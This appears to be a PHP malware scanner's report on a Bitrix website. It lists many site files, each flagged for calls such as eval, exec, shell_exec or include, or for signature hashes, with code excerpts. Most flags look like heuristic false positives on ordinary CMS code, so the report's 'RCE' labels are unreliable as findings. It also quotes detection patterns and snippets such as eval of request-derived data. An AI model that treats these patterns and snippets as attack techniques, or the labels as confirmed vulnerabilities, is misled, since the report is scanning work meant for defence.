system (in other words, no updates may be available). If any of the module updates are available, please install it first."; $MESS["SUP_SRC_ACT_ALT"] = "Download source code"; $MESS["SUP_SRC_ACT"] = "Download source code"; $MESS["SUP_SITES_PROMT"] = "You cannot create more than #NUM# site#END# using this kernel according to your license. If you need more sites, you can buy them any time. After you have purchased the additional sites, you will have to add them to the system."; $MESS["SUP_SITES_AC...

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/lang/en/classes/general/update_update5.php

Size: 25.89 kB Created: 2017-05-21 22:21:38 Modified: 2023-06-30 13:57:54 Warns: 1
DescriptionMatch

Function system Warning

Potentially dangerous function `system`

[https://www.php.net/system]

system (in other words, no updates may be available). If any of the module updates are available, please install it first."; $MESS["SUP_SRC_ACT"] = "Download source code"; $MESS["SUP_CHECK_PROMT"] = "You can create not more than #NUM# site(s) based on this kernel according to your license."; $MESS["SUP_CHECK_PROMT_2"] = "You can create an unlimited number of wesbsites using this product installation."; $MESS["SUP_CHECK_PROMT_1"] = "You can extend your period of technical support, purchase additi...

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/lang/en/classes/general/update_client.php

Size: 24.45 kB Created: 2017-11-20 14:16:06 Modified: 2023-06-30 13:57:54 Warns: 1
DescriptionMatch

Function system Warning

Potentially dangerous function `system`

[https://www.php.net/system]

system (in other words, no updates may be available). If any of the module updates are available, please install it first."; $MESS["SUP_SRC_ACT"] = "Download source code"; $MESS["SUP_CHECK_PROMT"] = "You can create not more than #NUM# site(s) based on this kernel according to your license."; $MESS["SUP_CHECK_PROMT_2"] = "You can create an unlimited number of websites using this product installation."; $MESS["SUP_CHECK_PROMT_21"] = "You can add unlimited number of users for the current product co...

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/lang/en/admin/site_checker.php

Size: 51.25 kB Created: 2017-05-21 22:21:38 Modified: 2023-06-30 13:57:54 Dangers: 1
DescriptionMatch

Sign 471b95ee Line: 92 Dangerous

Malware Signature (hash: 471b95ee)

suhosin

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/lang/en/admin/update_system.php

Size: 15.12 kB Created: 2017-11-20 14:16:06 Modified: 2023-06-30 13:57:54 Warns: 1
DescriptionMatch

Function system Warning

Potentially dangerous function `system`

[https://www.php.net/system]

system (in other words, no updates may be available). If any of the module updates are available, please install them first."; $MESS["SUP_SUBS_BUTTON"] = "Download source code"; $MESS["SUP_SUPPORT_BUTTON"] = "Reload All Files"; $MESS["SUP_INITIAL"] = "Initialising..."; $MESS["SUP_SUBS_SUCCESS"] = "The source code has been downloaded successfully"; $MESS["SUP_SUPPORT_SUCCESS"] = "Files has been downloaded successfully."; $MESS["SUP_SUBS_MED"] = "Downloaded source code for"; $MESS["SUP_SUPPORT_MED...

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/start.php

Size: 12.83 kB Created: 2017-11-21 16:20:30 Modified: 2023-06-30 13:57:52 Dangers: 1
DescriptionMatch

Exploit execution Line: 237 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].BX_ROOT."/modules/main/include/dbconn_error.php")

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/interface/epilog_main_admin.php

Size: 4.07 kB Created: 2017-05-21 22:21:38 Modified: 2023-06-30 13:57:54 Dangers: 2
DescriptionMatch

Exploit execution Line: 44 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].$siteSupport)

Exploit execution Line: 5 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/main/interface/lang_files.php")

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/interface/admin_lib.php

Size: 58.58 kB Created: 2017-11-21 16:20:29 Modified: 2023-06-30 13:57:54 Warns: 1 Dangers: 1
DescriptionMatch

Exploit execution Line: 443 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].BX_ROOT."/admin/.left.menu.php")

Function create_function Warning

Potentially dangerous function `create_function`

[https://www.php.net/create_function]

create_function('$a, $b''return strcasecmp($a["ID"], $b["ID"]);')); return $aThemes; } public static function GetCurrentTheme() { $aUserOpt CUserOptions::GetOption("global""settings"); if($aUserOpt["theme_id"] <> "") { $theme preg_replace("/[^a-z0-9_.-]/i"""$aUserOpt["theme_id"]); if($theme <> "") { return $theme; } } return ".default"; } } class CAdminUtil { public static function dumpVars($vars$arExclusions = array()) { $result ""; if (is_array($vars)) { foreach ($vars as $varN...

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/interface/prolog_main_admin.php

Size: 15.84 kB Created: 2017-05-21 22:21:38 Modified: 2023-06-30 13:57:54 Dangers: 3
DescriptionMatch

Exploit execution Line: 245 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].BX_PERSONAL_ROOT."/php_interface/this_site_logo.php")

Exploit execution Line: 257 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].BX_ROOT."/.config.php")

Exploit execution Line: 97 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].$adminHeader)

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/interface/admin_list.php

Size: 38.62 kB Created: 2017-11-21 16:20:30 Modified: 2023-06-30 13:57:54 Warns: 2
DescriptionMatch

Function create_function Warning

Potentially dangerous function `create_function`

[https://www.php.net/create_function]

create_function('$a, $b''if($a["__sort"] == $b["__sort"]) return 0; return ($a["__sort"] < $b["__sort"])? -1 : 1;')); } foreach($this->aHeaders as $id=>$arHeader) { if(in_array($id$this->arVisibleColumns)) $this->aVisibleHeaders[$id] = $arHeader; } if (isset($_REQUEST["mode"]) && $_REQUEST["mode"] == "settings"$this->ShowSettings($aAllCols$aCols$aOptions); } function ShowSettings($aAllCols$aCols$aOptions) { global $USER; require($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/main/inclu...

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval(this.form.action[this.form.action.selectedIndex].getAttribute('custom_action'));return false;}" disabled="disabled" class="adm-table-action-button" />
<? endif; ?>
    <span class="adm-table-counter" id="<?=$this->table_id?>_selected_count"><?=GetMessage('admin_lib_checked')?>: <span>0</span></span>
<? endif; ?>
</div>
<? } public function DisplayList($arParams = array()) { $menu = new CAdminPopup($this->table_id."_menu"$this->table_id."_menu"); $menu->Show(); if( (isset($_REQUEST['ajax_debu...

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/interface/prolog_auth_admin.php

Size: 2.90 kB Created: 2017-05-21 22:21:38 Modified: 2023-06-30 13:57:54 Dangers: 1
DescriptionMatch

Exploit execution Line: 61 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].BX_ROOT."/.config.php")

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/interface/epilog_jspopup_admin.php

Size: 221.00 B Created: 2017-05-21 22:21:38 Modified: 2023-06-30 13:57:54 Dangers: 1
DescriptionMatch

Exploit execution Line: 5 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/main/interface/lang_files.php")

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/interface/epilog_auth_admin.php

Size: 1.56 kB Created: 2017-05-21 22:21:38 Modified: 2023-06-30 13:57:54 Dangers: 1
DescriptionMatch

Exploit execution Line: 7 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/main/interface/lang_files.php")

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/interface/lang_files.php

Size: 3.48 kB Created: 2017-05-21 22:21:38 Modified: 2023-06-30 13:57:54 Dangers: 1
DescriptionMatch

Exploit execution Line: 72 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].$NEW_LANGS[$i])

/var/www/kievflotq/kievflot.ua/bitrix/modules/main/interface/auth/wrapper.php

Size: 5.87 kB Created: 2017-05-21 22:21:38 Modified: 2023-06-30 13:57:54 Dangers: 2
DescriptionMatch

Exploit execution Line: 128 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].$siteSupport)

Exploit execution Line: 68 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].BX_ROOT."/modules/main/interface/auth/wrapper_auth_result.php")

/var/www/kievflotq/kievflot.ua/bitrix/gadgets/bitrix/probki/index.php

Size: 98.00 B Created: 2017-05-21 22:21:36 Modified: 2023-06-30 13:57:50 Dangers: 1
DescriptionMatch

Exploit execution Line: 2 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER['DOCUMENT_ROOT'].'/bitrix/gadgets/bitrix/probki/lang/ru/exec/index.php')

/var/www/kievflotq/kievflot.ua/bitrix/gadgets/bitrix/probki/.parameters.php

Size: 102.00 B Created: 2017-05-21 22:21:36 Modified: 2023-06-30 13:57:50 Dangers: 1
DescriptionMatch

Exploit execution Line: 2 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER['DOCUMENT_ROOT'].'/bitrix/gadgets/bitrix/probki/lang/ru/exec/.parameters.php')

/var/www/kievflotq/kievflot.ua/bitrix/gadgets/bitrix/probki/.description.php

Size: 142.00 B Created: 2017-05-21 22:21:36 Modified: 2023-06-30 13:57:50 Dangers: 1
DescriptionMatch

Exploit execution Line: 2 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER['DOCUMENT_ROOT'].'/bitrix/gadgets/bitrix/probki/lang/ru/exec/.description.php')

/var/www/kievflotq/kievflot.ua/bitrix/gadgets/bitrix/admin_security/index.php

Size: 4.50 kB Created: 2017-11-21 16:21:35 Modified: 2023-06-30 13:57:50 Dangers: 1
DescriptionMatch

Exploit execution Line: 40 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/security/install/version.php")

/var/www/kievflotq/kievflot.ua/bitrix/gadgets/bitrix/weather/index.php

Size: 99.00 B Created: 2017-05-21 22:21:36 Modified: 2023-06-30 13:57:50 Dangers: 1
DescriptionMatch

Exploit execution Line: 2 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER['DOCUMENT_ROOT'].'/bitrix/gadgets/bitrix/weather/lang/ru/exec/index.php')

/var/www/kievflotq/kievflot.ua/bitrix/gadgets/bitrix/weather/.parameters.php

Size: 103.00 B Created: 2017-05-21 22:21:36 Modified: 2023-06-30 13:57:50 Dangers: 1
DescriptionMatch

Exploit execution Line: 2 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER['DOCUMENT_ROOT'].'/bitrix/gadgets/bitrix/weather/lang/ru/exec/.parameters.php')

/var/www/kievflotq/kievflot.ua/bitrix/gadgets/bitrix/weather/.description.php

Size: 143.00 B Created: 2017-05-21 22:21:36 Modified: 2023-06-30 13:57:50 Dangers: 1
DescriptionMatch

Exploit execution Line: 2 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER['DOCUMENT_ROOT'].'/bitrix/gadgets/bitrix/weather/lang/ru/exec/.description.php')

/var/www/kievflotq/kievflot.ua/bitrix/gadgets/bitrix/weather/city.php

Size: 96.00 B Created: 2017-05-21 22:21:36 Modified: 2023-06-30 13:57:50 Dangers: 1
DescriptionMatch

Exploit execution Line: 2 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER['DOCUMENT_ROOT'].'/bitrix/gadgets/bitrix/weather/lang/ru/exec/city.php')

/var/www/kievflotq/kievflot.ua/bitrix/gadgets/bitrix/admin_info/index.php

Size: 2.18 kB Created: 2017-05-21 22:21:36 Modified: 2023-06-30 13:57:50 Dangers: 1
DescriptionMatch

Exploit execution Line: 6 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].BX_ROOT."/.config.php")

/var/www/kievflotq/kievflot.ua/bitrix/tools/vote/vote_chart.php

Size: 448.00 B Created: 2017-05-21 22:21:36 Modified: 2023-06-30 13:57:54 Dangers: 1
DescriptionMatch

Exploit execution Line: 10 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"]."/".$file)

/var/www/kievflotq/kievflot.ua/bitrix/managed_cache/MYSQL/e5/e56397d99b3a76ae3f02219877fed2c7.php

Size: 13.32 kB Created: 2024-03-04 15:30:54 Modified: 2024-03-04 15:30:54 Dangers: 1
DescriptionMatch

Sign b236d073 Line: 5 Dangerous

Malware Signature (hash: b236d073)

/*;*/

/var/www/kievflotq/kievflot.ua/bitrix/updates/update_m1511274031/main/lib/entity/query.php

Size: 75.80 kB Created: 2017-11-21 16:20:31 Modified: 2023-06-30 13:57:54 Warns: 1
DescriptionMatch

Function exec Warning

Potentially dangerous function `exec`

[https://www.php.net/exec]

exec() { $this->is_executing true$query $this->buildQuery(); $cacheId ""$ttl 0$result null; if($this->cacheTtl && (empty($this->join_map) || $this->cacheJoins == true)) { $ttl $this->entity->getCacheTtl($this->cacheTtl); } if($ttl 0) { $cacheId md5($query); $result $this->entity->readFromCache($ttl$cacheId$this->countTotal); } if($result === null) { $result $this->query($query); if($ttl 0) { $result $this->entity->writeToCache($result$cacheId$this->count...

/var/www/kievflotq/kievflot.ua/bitrix/updates/update_m1511274031/main/lib/composite/responder.php

Size: 18.28 kB Created: 2017-11-21 16:20:31 Modified: 2023-06-30 13:57:54 Dangers: 1
DescriptionMatch

Exploit execution Line: 650 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].BX_ROOT."/modules/cluster/memcache.php")

/var/www/kievflotq/kievflot.ua/bitrix/updates/update_m1511274031/main/include.php

Size: 22.67 kB Created: 2017-11-21 16:20:31 Modified: 2023-06-30 13:57:54 Dangers: 2
DescriptionMatch

Sign 99fc3b9d Line: 101 Dangerous

Malware Signature (hash: 99fc3b9d)

$GLOBALS['____

Sign d97f004d Line: 101 Dangerous

Malware Signature (hash: d97f004d)

ZGVmaW5l

/var/www/kievflotq/kievflot.ua/bitrix/updates/update_m1511274031/main/classes/general/user.php

Size: 138.93 kB Created: 2017-11-21 16:20:31 Modified: 2023-06-30 13:57:54 Dangers: 1
DescriptionMatch

Exploit execution Line: 4767 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"].$path)

/var/www/kievflotq/kievflot.ua/bitrix/updates/update_m1511274031/main/classes/general/controller_member.php

Size: 41.85 kB Created: 2017-11-21 16:20:31 Modified: 2023-06-30 13:57:54 Warns: 1 Dangers: 1
DescriptionMatch

Exploit execution Line: 1076 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

base64_decode($_REQUEST['parameters'])

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval($disconnect_command); COption::SetOptionString("main""controller_member""N"); } public static function GetBackup($bRefresh false) { static $arCachedData; if(!isset($arCachedData) || $bRefresh$arCachedData unserialize(COption::GetOptionString("main""~controller_backup""")); return $arCachedData; } public static function SetBackup($arBackup) { COption::SetOptionString("main""~controller_backup"serialize($arBackup)); CControllerClient::GetBackup(true); } public static functio...

/var/www/kievflotq/kievflot.ua/bitrix/updates/update_m1511274031/main/admin/user_admin.php

Size: 23.85 kB Created: 2017-11-21 16:20:31 Modified: 2023-06-30 13:57:54 Warns: 1
DescriptionMatch

Exploit double_var2 Line: 69 Warning

Double var technique is usually used for the obfuscation of malicious code

${$f}

/var/www/kievflotq/kievflot.ua/bitrix/updates/update_m1511274031/main/tools.php

Size: 166.27 kB Created: 2017-11-21 16:20:31 Modified: 2023-06-30 13:57:54 Warns: 1 Dangers: 2
DescriptionMatch

Exploit download_remote_code2 Line: 3342 Dangerous

RFU (Remote File Upload), via HTTP, allow to write malicious code on the target machine

fwrite($fp"Host: ".$_SERVER["HTTP_HOST"]."\nDate: ".date("Y-m-d H:i:s")

Exploit execution Line: 3742 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/main/countries.php")

Function exec Warning

Potentially dangerous function `exec`

[https://www.php.net/exec]

exec(ua) != null)
                        {
                            rv parseFloat(RegExp.$1);
                        }
                    }
                    else if (n.appName == "Netscape")
                    {
                        rv 11;
                        re = new RegExp("Trident/.*rv:([0-9]+[\.0-9]*)");
                        if (re.exec(ua) != null)
                        {
                            rv parseFloat(RegExp.$1);
                        }
                    }
                }

                return rv;
            }

        })(windowdocumentnavigator);
JS;
return '<script type="text/javascript" data-skip-moving="true">'.str_replace(array("\n""\t"), ""$js)."</script>"; } public static function GetScrip...

/var/www/kievflotq/kievflot.ua/bitrix/updates/update_m1511274031/main/install/gadgets/bitrix/admin_security/index.php

Size: 4.50 kB Created: 2017-11-21 16:20:31 Modified: 2023-06-30 13:57:54 Dangers: 1
DescriptionMatch

Exploit execution Line: 40 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/security/install/version.php")

/var/www/kievflotq/kievflot.ua/bitrix/coupon_activation.php

Size: 16.58 kB Created: 2017-05-21 22:21:35 Modified: 2023-06-30 13:57:42 Dangers: 1
DescriptionMatch

Exploit execution Line: 148 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"]."/bitrix/license_key.php")

/var/www/kievflotq/kievflot.ua/local/templates/kievflot/components/bitrix/catalog/catalog/section.php

Size: 2.36 kB Created: 2017-05-21 22:21:35 Modified: 2023-06-30 13:57:55 Dangers: 1
DescriptionMatch

Exploit execution Line: 75 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

include($_SERVER["DOCUMENT_ROOT"]."/".$this->GetFolder()

/var/www/kievflotq/kievflot.ua/local/templates/kievflot/components/khayr/main.comment/main_beta/tinymce/plugins/jbimages/ci/system/core/Loader.php

Size: 29.86 kB Created: 2017-05-21 22:21:35 Modified: 2023-06-30 13:57:55 Warns: 1 Dangers: 1
DescriptionMatch

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval('?>'.preg_replace("/;*\s*\?>/""; ?>"str_replace('<?=''echo 'file_get_contents($_ci_path)))); } else { include($_ci_path); } log_message('debug''File loaded: '.$_ci_path); if ($_ci_return === TRUE) { $buffer ob_get_contents(); @ob_end_clean(); return $buffer; } if (ob_get_level() > $this->_ci_ob_level 1) { ob_end_flush(); } else { $_ci_CI->output->append_output(ob_get_contents()); @ob_end_clean(); } } protected function _ci_load_class($class$params NULL$object_name ...

Sign 11413268 Line: 829 Dangerous

Malware Signature (hash: 11413268)

eval('?>

/var/www/kievflotq/kievflot.ua/local/templates/kievflot/components/khayr/main.comment/main_beta/tinymce/plugins/jbimages/ci/system/core/Input.php

Size: 17.89 kB Created: 2017-05-21 22:21:35 Modified: 2023-06-30 13:57:55 Dangers: 1
DescriptionMatch

Sign 11413268 Line: 720 Dangerous

Malware Signature (hash: 11413268)

exploit

/var/www/kievflotq/kievflot.ua/local/templates/kievflot/components/khayr/main.comment/main_beta/tinymce/plugins/jbimages/ci/system/libraries/Image_lib.php

Size: 36.47 kB Created: 2017-05-21 22:21:35 Modified: 2023-06-30 13:57:55 Warns: 1
DescriptionMatch

Function exec Warning

Potentially dangerous function `exec`

[https://www.php.net/exec]

exec($cmd$output$retval); if ($retval 0) { $this->set_error('imglib_image_process_failed'); return FALSE; } @chmod($this->full_dst_pathFILE_WRITE_MODE); return TRUE; } function image_process_netpbm($action 'resize') { if ($this->library_path == '') { $this->set_error('imglib_libpath_invalid'); return FALSE; } switch ($this->image_type) { case $cmd_in 'giftopnm'$cmd_out 'ppmtogif'; break; case $cmd_in 'jpegtopnm'$cmd_out 'ppmtojpeg'; break; case $cmd_in 'pngtop...

/var/www/kievflotq/kievflot.ua/local/templates/kievflot/components/khayr/main.comment/main_beta/tinymce/plugins/jbimages/ci/system/libraries/Upload.php

Size: 26.90 kB Created: 2017-05-21 22:21:35 Modified: 2023-06-30 13:57:55 Warns: 2
DescriptionMatch

Function exec Warning

Potentially dangerous function `exec`

[https://www.php.net/exec]

exec($cmd$mime$return_status); if ($return_status === && is_string($mime) && preg_match($regexp$mime$matches)) { $this->file_type $matches[1]; return; } } if ( (bool) @ini_get('safe_mode') === FALSE && function_exists('shell_exec')) { $mime = @shell_exec($cmd); if (strlen($mime) > 0) { $mime explode("\n"trim($mime)); if (preg_match($regexp$mime[(count($mime) - 1)], $matches)) { $this->file_type $matches[1]; return; } } } if (function_exists('popen')) { $proc = @popen($cmd'r...

Function shell_exec Warning

Potentially dangerous function `shell_exec`

[https://www.php.net/shell_exec]

shell_exec($cmd); if (strlen($mime) > 0) { $mime explode("\n"trim($mime)); if (preg_match($regexp$mime[(count($mime) - 1)], $matches)) { $this->file_type $matches[1]; return; } } } if (function_exists('popen')) { $proc = @popen($cmd'r'); if (is_resource($proc)) { $mime = @fread($proc512); @pclose($proc); if ($mime !== FALSE) { $mime explode("\n"trim($mime)); if (preg_match($regexp$mime[(count($mime) - 1)], $matches)) { $this->file_type $matches[1]; return; } } } } } if (funct...

/var/www/kievflotq/kievflot.ua/local/templates/kievflot/components/khayr/main.comment/to_delete/tinymce/plugins/jbimages/ci/system/core/Loader.php

Size: 29.86 kB Created: 2017-05-21 22:21:35 Modified: 2023-06-30 13:57:55 Warns: 1 Dangers: 1
DescriptionMatch

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

eval('?>'.preg_replace("/;*\s*\?>/""; ?>"str_replace('<?=''echo 'file_get_contents($_ci_path)))); } else { include($_ci_path); } log_message('debug''File loaded: '.$_ci_path); if ($_ci_return === TRUE) { $buffer ob_get_contents(); @ob_end_clean(); return $buffer; } if (ob_get_level() > $this->_ci_ob_level 1) { ob_end_flush(); } else { $_ci_CI->output->append_output(ob_get_contents()); @ob_end_clean(); } } protected function _ci_load_class($class$params NULL$object_name ...

Sign 11413268 Line: 829 Dangerous

Malware Signature (hash: 11413268)

eval('?>

/var/www/kievflotq/kievflot.ua/local/templates/kievflot/components/khayr/main.comment/to_delete/tinymce/plugins/jbimages/ci/system/core/Input.php

Size: 17.89 kB Created: 2017-05-21 22:21:35 Modified: 2023-06-30 13:57:55 Dangers: 1
DescriptionMatch

Sign 11413268 Line: 720 Dangerous

Malware Signature (hash: 11413268)

exploit

/var/www/kievflotq/kievflot.ua/local/templates/kievflot/components/khayr/main.comment/to_delete/tinymce/plugins/jbimages/ci/system/libraries/Image_lib.php

Size: 36.47 kB Created: 2017-05-21 22:21:35 Modified: 2023-06-30 13:57:55 Warns: 1
DescriptionMatch

Function exec Warning

Potentially dangerous function `exec`

[https://www.php.net/exec]

exec($cmd$output$retval); if ($retval 0) { $this->set_error('imglib_image_process_failed'); return FALSE; } @chmod($this->full_dst_pathFILE_WRITE_MODE); return TRUE; } function image_process_netpbm($action 'resize') { if ($this->library_path == '') { $this->set_error('imglib_libpath_invalid'); return FALSE; } switch ($this->image_type) { case $cmd_in 'giftopnm'$cmd_out 'ppmtogif'; break; case $cmd_in 'jpegtopnm'$cmd_out 'ppmtojpeg'; break; case $cmd_in 'pngtop...

/var/www/kievflotq/kievflot.ua/local/templates/kievflot/components/khayr/main.comment/to_delete/tinymce/plugins/jbimages/ci/system/libraries/Upload.php

Size: 26.90 kB Created: 2017-05-21 22:21:35 Modified: 2023-06-30 13:57:55 Warns: 2
DescriptionMatch

Function exec Warning

Potentially dangerous function `exec`

[https://www.php.net/exec]

exec($cmd$mime$return_status); if ($return_status === && is_string($mime) && preg_match($regexp$mime$matches)) { $this->file_type $matches[1]; return; } } if ( (bool) @ini_get('safe_mode') === FALSE && function_exists('shell_exec')) { $mime = @shell_exec($cmd); if (strlen($mime) > 0) { $mime explode("\n"trim($mime)); if (preg_match($regexp$mime[(count($mime) - 1)], $matches)) { $this->file_type $matches[1]; return; } } } if (function_exists('popen')) { $proc = @popen($cmd'r...

Function shell_exec Warning

Potentially dangerous function `shell_exec`

[https://www.php.net/shell_exec]

shell_exec($cmd); if (strlen($mime) > 0) { $mime explode("\n"trim($mime)); if (preg_match($regexp$mime[(count($mime) - 1)], $matches)) { $this->file_type $matches[1]; return; } } } if (function_exists('popen')) { $proc = @popen($cmd'r'); if (is_resource($proc)) { $mime = @fread($proc512); @pclose($proc); if ($mime !== FALSE) { $mime explode("\n"trim($mime)); if (preg_match($regexp$mime[(count($mime) - 1)], $matches)) { $this->file_type $matches[1]; return; } } } } } if (funct...